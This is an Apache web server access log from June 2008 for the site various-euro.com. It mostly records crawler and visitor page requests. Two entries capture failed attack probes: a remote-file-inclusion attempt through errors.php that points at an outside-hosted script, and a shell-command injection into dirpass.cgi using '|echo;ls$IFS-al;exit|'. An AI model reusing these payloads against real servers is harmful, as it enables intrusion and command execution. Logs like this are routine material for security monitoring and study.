67.195.51.123 - - [06/Jun/2008:15:27:57 +0200] "GET /zampa/montenegro/TESLAW.html HTTP/1.0" 200 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.98 - - [06/Jun/2008:15:43:37 +0200] "GET /zampa/montenegro/BATAW.html HTTP/1.0" 200 860 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [06/Jun/2008:16:02:17 +0200] "GET /f-contact.html HTTP/1.0" 200 6804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.156 - - [06/Jun/2008:16:09:22 +0200] "GET /zampa-lovers/ HTTP/1.1" 200 37790 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
81.52.143.16 - - [06/Jun/2008:16:21:44 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.16 - - [06/Jun/2008:16:21:46 +0200] "GET /schubb/schubb-2.html HTTP/1.1" 200 16660 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
220.181.19.167 - - [06/Jun/2008:16:54:34 +0200] "GET / HTTP/1.1" 302 353 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
213.171.204.184 - - [06/Jun/2008:16:54:37 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "-"
213.171.204.184 - - [06/Jun/2008:16:54:37 +0200] "GET /logs/usage_200710.html HTTP/1.1" 200 110952 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
220.181.19.167 - - [06/Jun/2008:16:54:44 +0200] "GET /robots.txt HTTP/1.1" 304 - "-" "-"
74.6.18.217 - - [06/Jun/2008:16:55:03 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.126 - - [06/Jun/2008:16:55:04 +0200] "GET /f-warez.html HTTP/1.0" 200 10953 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.52 - - [06/Jun/2008:17:27:28 +0200] "GET /zampa/montenegro/SEKAW.html HTTP/1.0" 200 860 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.116.150.54 - - [06/Jun/2008:17:43:54 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.116.150.54 - - [06/Jun/2008:17:43:56 +0200] "GET /framez.html HTTP/1.0" 200 3883 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.116.150.54 - - [06/Jun/2008:17:43:56 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.195.37.109 - - [06/Jun/2008:17:48:25 +0200] "GET /games/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.92 - - [06/Jun/2008:17:54:16 +0200] "GET /zampa/montenegro/ HTTP/1.0" 200 2651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [06/Jun/2008:17:55:58 +0200] "GET /schubb/schubb-3.html HTTP/1.0" 200 17546 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
79.28.196.75 - - [06/Jun/2008:18:03:24 +0200] "GET / HTTP/1.1" 302 353 "http://www.google.it/search?sourceid=navclient&ie=UTF-8&rlz=1T4RNWN_enIT276IT276&q=zampa+di+leone+" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.28.196.75 - - [06/Jun/2008:18:03:24 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.google.it/search?sourceid=navclient&ie=UTF-8&rlz=1T4RNWN_enIT276IT276&q=zampa+di+leone+" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.28.196.75 - - [06/Jun/2008:18:03:25 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.28.196.75 - - [06/Jun/2008:18:03:25 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.28.196.75 - - [06/Jun/2008:18:03:25 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.28.196.75 - - [06/Jun/2008:18:03:25 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.28.196.75 - - [06/Jun/2008:18:03:26 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "-"
77.212.214.123 - - [06/Jun/2008:18:12:52 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
65.55.211.164 - - [06/Jun/2008:18:37:05 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.164 - - [06/Jun/2008:18:37:05 +0200] "GET /neon/sushi.html HTTP/1.1" 200 687 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.110.96 - - [06/Jun/2008:18:38:20 +0200] "GET /neon/sushi.html HTTP/1.0" 200 687 "http://search.live.com/results.aspx?q=sushi&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
69.36.158.62 - - [06/Jun/2008:18:43:56 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:43:57 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:43:59 +0200] "GET /framez.html HTTP/1.1" 200 3883 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:44:00 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:44:01 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:44:02 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:44:04 +0200] "GET /f-search.html HTTP/1.1" 200 11800 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:44:05 +0200] "GET /f-contact.html HTTP/1.1" 200 6804 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:44:06 +0200] "GET /f-sponsor.html HTTP/1.1" 200 8578 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:44:07 +0200] "GET /f-warez.html HTTP/1.1" 200 10953 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
69.36.158.62 - - [06/Jun/2008:18:44:09 +0200] "GET /f-web.html HTTP/1.1" 200 13605 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7"
67.195.37.109 - - [06/Jun/2008:18:59:54 +0200] "GET /f-doku-brau.html HTTP/1.0" 200 7152 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [06/Jun/2008:19:41:51 +0200] "GET /neon/behindd.html HTTP/1.0" 200 476 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:19:45:21 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:19:45:22 +0200] "GET /sendi_agent.html HTTP/1.0" 200 6213 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:19:45:24 +0200] "GET /3dsf3/sendi/sendisendi.html HTTP/1.0" 200 5118 "http://www.various-euro.com/sendi_agent.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:19:45:24 +0200] "GET /3dsf3/sendi/index.html HTTP/1.0" 200 1837 "http://www.various-euro.com/sendi_agent.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [06/Jun/2008:20:11:38 +0200] "GET /bmpp/WS_FTP.LOG HTTP/1.0" 200 1352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [06/Jun/2008:20:15:21 +0200] "GET /DgH/watch/index.html HTTP/1.0" 200 2028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
79.101.237.221 - - [06/Jun/2008:20:17:02 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
67.195.37.109 - - [06/Jun/2008:20:21:33 +0200] "GET /logs/usage_200703.html HTTP/1.0" 200 108444 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.200.88.252 - - [06/Jun/2008:20:25:58 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 16133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.200.88.252 - - [06/Jun/2008:20:26:06 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 16133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.200.88.252 - - [06/Jun/2008:20:26:12 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 16133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
220.181.19.167 - - [06/Jun/2008:21:02:20 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
74.6.17.188 - - [06/Jun/2008:21:55:16 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.51 - - [06/Jun/2008:21:55:16 +0200] "GET /zampa/montenegro/ZMAJW.html HTTP/1.0" 200 860 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:21:59:27 +0200] "GET /f-world.html HTTP/1.0" 200 35590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:22:01:51 +0200] "GET /zampa/montenegro/dajpare.html HTTP/1.0" 200 2503 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:22:09:03 +0200] "GET /zampa/montenegro/TESLAW.html HTTP/1.0" 200 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:22:09:37 +0200] "GET /zampa/montenegro/ HTTP/1.0" 200 2651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
137.9.121.122 - - [06/Jun/2008:22:24:59 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "Mozilla/4.0 (compatible;)"
67.195.37.109 - - [06/Jun/2008:22:40:56 +0200] "GET /DgH/ HTTP/1.0" 200 5024 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.58.13.39 - - [06/Jun/2008:22:50:52 +0200] "GET /f-zeug.html HTTP/1.1" 200 45338 "http://www.google.de/search?q=Tarifabfrage+bosnia&sourceid=navclient-ff&ie=UTF-8&rlz=1B2GGGL_deDE230DE230" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:52 +0200] "GET /16cols.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/f-zeug.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:52 +0200] "GET /16cols.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/f-zeug.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:53 +0200] "GET /framez-zeug.html HTTP/1.1" 200 4311 "http://www.various-euro.com/f-zeug.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "http://www.various-euro.com/framez-zeug.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez-zeug.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /f-zeug.html HTTP/1.1" 200 45338 "http://www.various-euro.com/framez-zeug.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /16cols.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/f-zeug.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.58.13.39 - - [06/Jun/2008:22:50:54 +0200] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.195.51.167 - - [06/Jun/2008:22:53:48 +0200] "GET /euro.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:22:54:56 +0200] "GET /3dsf3/sendi/rituals.html HTTP/1.0" 200 1411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [06/Jun/2008:23:00:16 +0200] "GET /3dsf3/sendi/communication.html HTTP/1.0" 200 1331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.99.30.56 - - [06/Jun/2008:23:27:15 +0200] "GET /bannerz/exit.gif HTTP/1.0" 200 2988 "http://www.munax.com/referer.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
87.66.26.133 - - [06/Jun/2008:23:32:12 +0200] "GET /f-restate_copy.html HTTP/1.1" 200 16347 "-" "Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)"
67.195.37.109 - - [06/Jun/2008:23:33:31 +0200] "GET /neon/europa.html HTTP/1.0" 200 389 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
128.54.49.204 - - [06/Jun/2008:23:53:41 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
128.54.49.204 - - [06/Jun/2008:23:53:43 +0200] "GET /ve-icon-2.ico HTTP/1.0" 200 2238 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
128.54.49.204 - - [06/Jun/2008:23:53:46 +0200] "GET /framez.html HTTP/1.0" 200 3883 "http://www.various-euro.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
208.80.193.38 - - [07/Jun/2008:00:03:57 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NovaPacs Viewer 6.0.197.0)"
208.80.193.38 - - [07/Jun/2008:00:03:57 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; SpamBlockerUtility 4.8.4; MSN 9.0;MSN 9.1; MSNbVZ02; MSNmen-us; MSNcOTH)"
67.195.37.109 - - [07/Jun/2008:00:21:09 +0200] "GET /f-net.html HTTP/1.0" 200 9913 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [07/Jun/2008:00:26:02 +0200] "GET /triple-double-u/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [07/Jun/2008:00:28:14 +0200] "GET /zampa-lovers/ HTTP/1.1" 200 37790 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
119.63.194.61 - - [07/Jun/2008:00:30:40 +0200] "GET / HTTP/1.1" 200 10127 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)"
67.195.52.48 - - [07/Jun/2008:00:41:08 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.0" 200 2129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
75.125.180.66 - - [07/Jun/2008:00:47:00 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
75.125.180.66 - - [07/Jun/2008:00:47:01 +0200] "GET /framez.html HTTP/1.0" 200 3883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
75.125.180.66 - - [07/Jun/2008:00:47:01 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5834 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
75.125.180.66 - - [07/Jun/2008:00:47:01 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
75.125.180.66 - - [07/Jun/2008:00:47:02 +0200] "GET /bmpp/euro_pal_1.html HTTP/1.0" 200 18252 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
75.125.180.66 - - [07/Jun/2008:00:47:02 +0200] "GET /sendi_agent.html HTTP/1.0" 200 6213 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
75.125.180.66 - - [07/Jun/2008:00:47:03 +0200] "GET /3dsf3/sendi/sendisendi.html HTTP/1.0" 200 5118 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
75.125.180.66 - - [07/Jun/2008:00:47:03 +0200] "GET /3dsf3/sendi/receiver.html HTTP/1.0" 200 1402 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
75.125.180.66 - - [07/Jun/2008:00:47:04 +0200] "GET /3dsf3/sendi/sacrifice.html HTTP/1.0" 200 1309 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
190.54.36.14 - - [07/Jun/2008:00:47:15 +0200] "GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 2748 "-" "libwww-perl/5.810"
74.6.17.179 - - [07/Jun/2008:01:04:50 +0200] "GET /robots.txt HTTP/1.0" 302 363 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.179 - - [07/Jun/2008:01:04:51 +0200] "GET /zampa/robots.txt HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.179 - - [07/Jun/2008:01:04:51 +0200] "GET / HTTP/1.0" 302 353 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [07/Jun/2008:01:04:53 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [07/Jun/2008:02:09:48 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.237.212.168 - - [07/Jun/2008:02:27:43 +0200] "GET http://various-euro.com/cgi-bin/dirpass.cgi?|echo;ls$IFS-al;exit| HTTP/1.0" 404 2748 "http://various-euro.com/cgi-bin/dirpass.cgi?|echo;ls$IFS-al;exit|" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
65.55.211.156 - - [07/Jun/2008:02:31:24 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.156 - - [07/Jun/2008:02:31:24 +0200] "GET /DgH/orginal/index.html HTTP/1.1" 200 1727 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.22.151 - - [07/Jun/2008:02:52:07 +0200] "GET /logs/usage_200709.html HTTP/1.0" 200 110974 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.205.64.226 - - [07/Jun/2008:03:04:17 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
81.52.143.15 - - [07/Jun/2008:03:13:25 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.15 - - [07/Jun/2008:03:13:33 +0200] "GET /DgH/orginal/index.html HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
65.55.211.170 - - [07/Jun/2008:03:47:56 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [07/Jun/2008:03:47:56 +0200] "GET /framez-web.html HTTP/1.1" 200 4322 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [07/Jun/2008:03:50:21 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [07/Jun/2008:03:50:21 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [07/Jun/2008:03:50:22 +0200] "GET /f-web.html HTTP/1.1" 200 13605 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [07/Jun/2008:03:50:23 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.110.211 - - [07/Jun/2008:03:52:02 +0200] "GET /framez-web.html HTTP/1.0" 200 4322 "http://search.live.com/results.aspx?q=various&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.110.211 - - [07/Jun/2008:03:52:03 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "http://www.various-euro.com/framez-web.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.110.211 - - [07/Jun/2008:03:52:03 +0200] "GET /f-web.html HTTP/1.0" 200 13605 "http://www.various-euro.com/framez-web.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.110.211 - - [07/Jun/2008:03:52:03 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez-web.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
67.195.37.109 - - [07/Jun/2008:03:53:56 +0200] "GET /zampa-lovers/ HTTP/1.0" 200 37790 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
